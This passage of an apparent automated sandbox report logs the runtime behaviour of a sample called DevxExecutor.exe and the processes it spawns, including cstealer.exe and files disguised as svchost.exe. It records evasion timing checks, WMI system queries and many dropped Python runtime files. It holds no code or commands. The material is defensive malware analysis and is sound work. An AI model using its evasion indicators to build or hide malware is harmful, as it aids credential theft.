                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (41 identical entries)
                                Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)
                                Source: C:\ProgramData\main.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)
                                Source: C:\ProgramData\main.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (2 identical entries)
                                Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (124 identical entries)

                                Malware Analysis System Evasion

                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
                                Source: C:\ProgramData\main.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Memory allocated: 36B0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Memory allocated: 1D1E0000 memory reserve | memory write watch
                                Source: C:\ProgramData\main.exe | Memory allocated: 16133500000 memory reserve | memory write watch
                                Source: C:\ProgramData\main.exe | Memory allocated: 1614D010000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 9_2_00007FF8A80332F6 rdtsc 9_2_00007FF8A80332F6
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (6 identical entries)
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 600000
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 599812
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 599656
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 599433
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 599323
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 599094
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598930
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598806
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598693
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598544
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598437
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598317
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598187
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 598035
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 597906
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 597716
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 597569
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 597453
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 597310
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 597109
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 596890
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 596680
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 596493
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 596344
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 596203
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 596056
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 595927
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 595778
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 595604
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 595216
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 595061
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 594937
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\cmd.exe | Window / User API: threadDelayed 10000
Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 9996
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Window / User API: threadDelayed 10000
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Window / User API: threadDelayed 9998
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3795
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3903
Source: C:\Windows\System32\cmd.exe | Window / User API: threadDelayed 9553
Source: C:\Windows\System32\cmd.exe | Window / User API: threadDelayed 445
Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 9995
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Window / User API: threadDelayed 9998
Source: C:\ProgramData\main.exe | Window / User API: threadDelayed 2320
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Window / User API: threadDelayed 9998
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 941
Source: C:\ProgramData\svchost.exe | Window / User API: threadDelayed 9998
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8785
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 412
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Window / User API: threadDelayed 9616
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Window / User API: threadDelayed 381
Source: C:\Windows\System32\cmd.exe | Window / User API: threadDelayed 9999
Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 9997
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Window / User API: threadDelayed 9999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2956
Source: C:\ProgramData\svchost.exe | Window / User API: threadDelayed 9991
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Window / User API: threadDelayed 8787
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\hacn.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_lzma.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\python311.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_pytransform.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\select.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_socket.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\nacl\_sodium.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_ssl.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\ProgramData\Microsoft\hacn.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_bz2.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\rar.exe
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-profile-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\python311.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_ctypes.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-2-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_hashlib.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-handle-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\wrapt\_wrappers.cp310-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\select.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\bcrypt\_bcrypt.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_decimal.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\python310.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd
Source: C:\ProgramData\setup.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\python311.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_decimal.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\pyexpat.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\unicodedata.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_ctypes.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_sqlite3.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-localization-l1-2-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_ssl.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_brotli.cp310-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_lzma.pyd
Source: C:\ProgramData\Microsoft\hacn.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\python311.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_queue.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_hashlib.pyd
Source: C:\ProgramData\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md.cp311-win_amd64.pyd
